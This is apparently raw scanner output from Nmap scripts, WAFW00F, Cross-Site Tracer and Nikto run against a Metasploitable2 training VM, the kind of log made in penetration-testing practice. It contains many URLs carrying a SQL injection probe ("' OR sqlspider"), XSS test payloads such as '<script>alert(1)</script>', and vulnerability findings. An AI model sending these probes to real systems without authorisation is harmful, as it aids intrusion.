| http://192.168.1.113/mutillidae/./index.php?page=text%2dfile%2dviewer%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=home%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/././index.php?page=text%2dfile%2dviewer%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/././index.php?page=dns%2dlookup%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=captured%2ddata%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=documentation%2fhow%2dto%2daccess%2dMutillidae%2dover%2dVirtual%2dBox%2dnetwork%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./?page=view%2dsomeones%2dblog%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=arbitrary%2dfile%2dinclusion%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/././index.php?page=capture%2ddata%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=framing%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./?page=source%2dviewer%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=secret%2dadministrative%2dpages%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/././index.php?page=set%2dbackground%2dcolor%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=change%2dlog%2ehtm%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=capture%2ddata%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=credits%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/././index.php?page=site%2dfooter%2dxss%2ddiscussion%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=source%2dviewer%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./?page=user%2dinfo%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./?page=text%2dfile%2dviewer%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/././index.php?page=show%2dlog%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/././index.php?page=html5%2dstorage%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./?page=show%2dlog%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/././index.php?page=register%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/././index.php?page=pen%2dtest%2dtool%2dlookup%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/././index.php?page=login%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=add%2dto%2dyour%2dblog%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/././index.php?page=user%2dpoll%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=html5%2dstorage%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./?page=add%2dto%2dyour%2dblog%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/index.php?page=change%2dlog%2ehtm%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/index.php?page=capture%2ddata%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=register%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=user%2dinfo%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=view%2dsomeones%2dblog%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=login%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/?page=credits%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/index.php?page=add%2dto%2dyour%2dblog%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?username=anonymous&page=password%2dgenerator%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=show%2dlog%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/?page=show%2dlog%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=set%2dbackground%2dcolor%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/?page=user%2dinfo%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=text%2dfile%2dviewer%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=html5%2dstorage%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/index.php?page=html5%2dstorage%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=credits%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=captured%2ddata%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/?page=source%2dviewer%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=dns%2dlookup%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=site%2dfooter%2dxss%2ddiscussion%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/index.php?page=user%2dinfo%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/index.php?page=documentation%2fvulnerabilities%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=pen%2dtest%2dtool%2dlookup%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=change%2dlog%2ehtm&do=toggle%2dhints%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/?page=view%2dsomeones%2dblog%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/index.php?page=login%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/index.php?page=installation%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=capture%2ddata%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/index.php?page=source%2dviewer%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/index.php?page=framing%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=user%2dpoll%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/index.php?page=documentation%2fhow%2dto%2daccess%2dMutillidae%2dover%2dVirtual%2dBox%2dnetwork%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/index.php?page=captured%2ddata%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/index.php?page=arbitrary%2dfile%2dinclusion%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=change%2dlog%2ehtm&do=toggle%2dsecurity%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/index.php?page=credits%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/index.php?page=secret%2dadministrative%2dpages%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/index.php?page=text%2dfile%2dviewer%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/?page=login%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=browser%2dinfo%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/?page=text%2dfile%2dviewer%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/?page=add%2dto%2dyour%2dblog%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/index.php?page=home%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/index.php?page=change%2dlog%2ehtm%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/index.php?page=capture%2ddata%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=register%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=user%2dinfo%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=view%2dsomeones%2dblog%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=login%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/?page=credits%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/index.php?page=add%2dto%2dyour%2dblog%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?username=anonymous&page=password%2dgenerator%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=show%2dlog%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/?page=show%2dlog%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=set%2dbackground%2dcolor%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/?page=user%2dinfo%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=text%2dfile%2dviewer%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=html5%2dstorage%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=credits%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=captured%2ddata%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/index.php?page=secret%2dadministrative%2dpages%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=dns%2dlookup%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=site%2dfooter%2dxss%2ddiscussion%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/index.php?page=user%2dinfo%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/index.php?page=documentation%2fvulnerabilities%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=pen%2dtest%2dtool%2dlookup%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/index.php?page=installation%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/?page=view%2dsomeones%2dblog%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/index.php?page=login%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/index.php?page=arbitrary%2dfile%2dinclusion%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=capture%2ddata%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/index.php?page=framing%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/?page=source%2dviewer%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=user%2dpoll%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/index.php?page=documentation%2fhow%2dto%2daccess%2dMutillidae%2dover%2dVirtual%2dBox%2dnetwork%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/index.php?page=captured%2ddata%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/index.php?page=credits%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/index.php?page=source%2dviewer%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/index.php?page=text%2dfile%2dviewer%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/?page=login%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/index.php?page=home%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=browser%2dinfo%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/?page=text%2dfile%2dviewer%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/?page=add%2dto%2dyour%2dblog%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/index.php?page=html5%2dstorage%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=installation%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/index.php?page=change%2dlog%2ehtm%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/index.php?page=capture%2ddata%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=register%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=user%2dinfo%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=view%2dsomeones%2dblog%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=login%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/?page=credits%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/index.php?page=add%2dto%2dyour%2dblog%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?username=anonymous&page=password%2dgenerator%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=show%2dlog%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=home%2ephp&do=toggle%2dhints%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/index.php?page=framing%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=set%2dbackground%2dcolor%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/?page=user%2dinfo%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=text%2dfile%2dviewer%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=home%2ephp&do=toggle%2dsecurity%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=html5%2dstorage%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/index.php?page=html5%2dstorage%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/index.php?page=installation%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=credits%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=php%2derrors%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=captured%2ddata%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=usage%2dinstructions%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=dns%2dlookup%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=site%2dfooter%2dxss%2ddiscussion%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/index.php?page=user%2dinfo%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/?page=source%2dviewer%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=pen%2dtest%2dtool%2dlookup%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/index.php?page=documentation%2fvulnerabilities%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/?page=view%2dsomeones%2dblog%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/index.php?page=login%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=change%2dlog%2ehtm%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=capture%2ddata%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/index.php?page=text%2dfile%2dviewer%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=notes%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=user%2dpoll%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/index.php?page=documentation%2fhow%2dto%2daccess%2dMutillidae%2dover%2dVirtual%2dBox%2dnetwork%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/index.php?page=captured%2ddata%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/index.php?page=arbitrary%2dfile%2dinclusion%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/index.php?page=credits%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/index.php?page=source%2dviewer%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/index.php?page=secret%2dadministrative%2dpages%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/?page=login%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/?page=show%2dlog%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=browser%2dinfo%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/?page=text%2dfile%2dviewer%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/?page=add%2dto%2dyour%2dblog%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/index.php?page=home%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=installation%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./?page=login%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/././index.php?page=view%2dsomeones%2dblog%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/././index.php?page=register%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=user%2dinfo%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./?page=credits%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=documentation%2fvulnerabilities%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=login%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/././index.php?page=browser%2dinfo%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/././index.php?username=anonymous&page=password%2dgenerator%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/././index.php?page=user%2dinfo%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/././index.php?page=captured%2ddata%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=text%2dfile%2dviewer%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=home%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=register%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/././index.php?page=text%2dfile%2dviewer%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/././index.php?page=dns%2dlookup%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=documentation%2fhow%2dto%2daccess%2dMutillidae%2dover%2dVirtual%2dBox%2dnetwork%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=captured%2ddata%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=credits%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./?page=view%2dsomeones%2dblog%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=framing%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/././index.php?page=capture%2ddata%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./?page=source%2dviewer%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=secret%2dadministrative%2dpages%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=add%2dto%2dyour%2dblog%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=arbitrary%2dfile%2dinclusion%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=change%2dlog%2ehtm%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=capture%2ddata%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=source%2dviewer%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/././index.php?page=site%2dfooter%2dxss%2ddiscussion%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./?page=user%2dinfo%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./?page=text%2dfile%2dviewer%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/././index.php?page=show%2dlog%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/././index.php?page=html5%2dstorage%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/././index.php?page=user%2dpoll%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./?page=show%2dlog%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/././index.php?page=credits%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=html5%2dstorage%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/././index.php?page=login%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/././index.php?page=pen%2dtest%2dtool%2dlookup%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/././index.php?page=set%2dbackground%2dcolor%2ephp%27%20OR%20sqlspider | |
|_ http://192.168.1.113/mutillidae/./?page=add%2dto%2dyour%2dblog%2ephp%27%20OR%20sqlspider | |
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities. | |
|_http-trace: TRACE is enabled | |
| http-useragent-tester: | |
| | |
| Allowed User Agents: | |
| Mozilla/5.0 (compatible; Nmap Scripting Engine; http://nmap.org/book/nse.html) | |
| libwww | |
| lwp-trivial | |
| libcurl-agent/1.0 | |
| PHP/ | |
| Python-urllib/2.5 | |
| GT::WWW | |
| Snoopy | |
| MFC_Tear_Sample | |
| HTTP::Lite | |
| PHPCrawl | |
| URI::Fetch | |
| Zend_Http_Client | |
| http client | |
| PECL::HTTP | |
| Wget/1.13.4 (linux-gnu) | |
| WWW-Mechanize/1.34 | |
|_ | |
MAC Address: 00:0C:29:0E:B0:99 (VMware) | |
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . | |
Nmap done: 1 IP address (1 host up) scanned in 59.81 seconds | |
^ ^ | |
_ __ _ ____ _ __ _ _ ____ | |
///7/ /.' \ / __////7/ /,' \ ,' \ / __/ | |
| V V // o // _/ | V V // 0 // 0 // _/ | |
|_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/ | |
< | |
...' | |
WAFW00F - Web Application Firewall Detection Tool | |
By Sandro Gauci && Wendel G. Henrique | |
Checking http://192.168.1.113 | |
Generic Detection results: | |
No WAF detected by the generic detection | |
Number of requests: 13 | |
http://192.168.1.113 [200] Apache[2.2.8], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.2.8 (Ubuntu) DAV/2], IP[192.168.1.113], PHP[5.2.4-2ubuntu5.10], Title[Metasploitable2 - Linux], WebDAV[2], X-Powered-By[PHP/5.2.4-2ubuntu5.10] | |
__ ______ _____ | |
\ \/ / ___|_ _| | |
\ /\___ \ | | | |
/ \ ___) || | | |
/_/\_|____/ |_| | |
+ -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield | |
+ -- --=[Target: 192.168.1.113:80 | |
+ -- --=[Site vulnerable to Cross-Site Tracing! | |
+ -- --=[Site is vulnerable to host header injection! | |
+ -- --=[Site vulnerable to Cross-Frame Scripting! | |
+ -- --=[Site vulnerable to Clickjacking! | |
HTTP/1.1 200 OK | |
Date: Sat, 05 Sep 2015 12:35:21 GMT | |
Server: Apache/2.2.8 (Ubuntu) DAV/2 | |
Transfer-Encoding: chunked | |
Content-Type: message/http | |
4b | |
TRACE / HTTP/1.1 | |
Test: <script>alert(1);</script> | |
Host: 192.168.1.113 | |
0 | |
HTTP/1.1 200 OK | |
Date: Sat, 05 Sep 2015 12:35:21 GMT | |
Server: Apache/2.2.8 (Ubuntu) DAV/2 | |
X-Powered-By: PHP/5.2.4-2ubuntu5.10 | |
Content-Length: 891 | |
Content-Type: text/html | |
<html><head><title>Metasploitable2 - Linux</title></head><body> | |
<pre> | |
_ _ _ _ _ _ ____ | |
_ __ ___ ___| |_ __ _ ___ _ __ | | ___ (_) |_ __ _| |__ | | ___|___ \ | |
| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __/ _` | '_ \| |/ _ \ __) | | |
| | | | | | __/ || (_| \__ \ |_) | | (_) | | || (_| | |_) | | __// __/ | |
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__\__,_|_.__/|_|\___|_____| | |
|_| | |
Warning: Never expose this VM to an untrusted network! | |
Contact: msfdev[at]metasploit.com | |
Login with msfadmin/msfadmin to get started | |
</pre> | |
<ul> | |
<li><a href="/twiki/">TWiki</a></li> | |
<li><a href="/phpMyAdmin/">phpMyAdmin</a></li> | |
<li><a href="/mutillidae/">Mutillidae</a></li> | |
<li><a href="/dvwa/">DVWA</a></li> | |
<li><a href="/da | |
+ -- --=[Checking if X-Content options are enabled on 192.168.1.113... | |
+ -- --=[Checking if X-Frame options are enabled on 192.168.1.113... | |
+ -- --=[Checking if X-XSS-Protection header is enabled on 192.168.1.113... | |
+ -- --=[Checking HTTP methods on 192.168.1.113... | |
+ -- --=[Checking if TRACE method is enabled on 192.168.1.113... | |
+ -- --=[Checking for open proxy on 192.168.1.113... | |
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> | |
<html><head> | |
<title>404 Not Found</title> | |
</head><body> | |
<h1>Not Found</h1> | |
<p>The requested URL /.testing/openproxy.txt was not found on this server.</p> | |
<hr> | |
<address>Apache/2.2.8 (Ubuntu) DAV/2 Server at crowdshield.com Port 80</address> | |
</body></html> | |
+ -- --=[Enumerating software on 192.168.1.113... | |
Server: Apache/2.2.8 (Ubuntu) DAV/2 | |
X-Powered-By: PHP/5.2.4-2ubuntu5.10 | |
+ -- --=[Checking if Strict-Transport-Security is enabled on 192.168.1.113... | |
+ -- --=[Checking for Flash cross-domain policy on 192.168.1.113... | |
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> | |
<html><head> | |
<title>404 Not Found</title> | |
</head><body> | |
<h1>Not Found</h1> | |
<p>The requested URL /crossdomain.xml was not found on this server.</p> | |
<hr> | |
<address>Apache/2.2.8 (Ubuntu) DAV/2 Server at 192.168.1.113 Port 80</address> | |
</body></html> | |
+ -- --=[Checking for Silverlight cross-domain policy on 192.168.1.113... | |
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> | |
<html><head> | |
<title>404 Not Found</title> | |
</head><body> | |
<h1>Not Found</h1> | |
<p>The requested URL /clientaccesspolicy.xml was not found on this server.</p> | |
<hr> | |
<address>Apache/2.2.8 (Ubuntu) DAV/2 Server at 192.168.1.113 Port 80</address> | |
</body></html> | |
+ -- --=[Checking for HTML5 cross-origin resource sharing on 192.168.1.113... | |
+ -- --=[Retrieving robots.txt on 192.168.1.113... | |
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> | |
<html><head> | |
<title>404 Not Found</title> | |
</head><body> | |
<h1>Not Found</h1> | |
<p>The requested URL /robots.txt was not found on this server.</p> | |
<hr> | |
<address>Apache/2.2.8 (Ubuntu) DAV/2 Server at 192.168.1.113 Port 80</address> | |
</body></html> | |
+ -- --=[Retrieving sitemap.xml on 192.168.1.113... | |
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> | |
<html><head> | |
<title>404 Not Found</title> | |
</head><body> | |
<h1>Not Found</h1> | |
<p>The requested URL /sitemap.xml was not found on this server.</p> | |
<hr> | |
<address>Apache/2.2.8 (Ubuntu) DAV/2 Server at 192.168.1.113 Port 80</address> | |
</body></html> | |
+ -- --=[Checking cookie attributes on 192.168.1.113... | |
- Nikto v2.1.6 | |
--------------------------------------------------------------------------- | |
+ Target IP: 192.168.1.113 | |
+ Target Hostname: 192.168.1.113 | |
+ Target Port: 80 | |
+ Start Time: 2015-09-06 17:28:59 (GMT-4) | |
--------------------------------------------------------------------------- | |
+ Server: Apache/2.2.8 (Ubuntu) DAV/2 | |
+ Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.10 | |
+ The anti-clickjacking X-Frame-Options header is not present. | |
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS | |
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type | |
+ Uncommon header 'tcn' found, with contents: list | |
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.php | |
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current. | |
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives. | |
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST | |
+ /phpinfo.php?VARIABLE=<script>alert('Vulnerable')</script>: Output from the phpinfo() function was found. | |
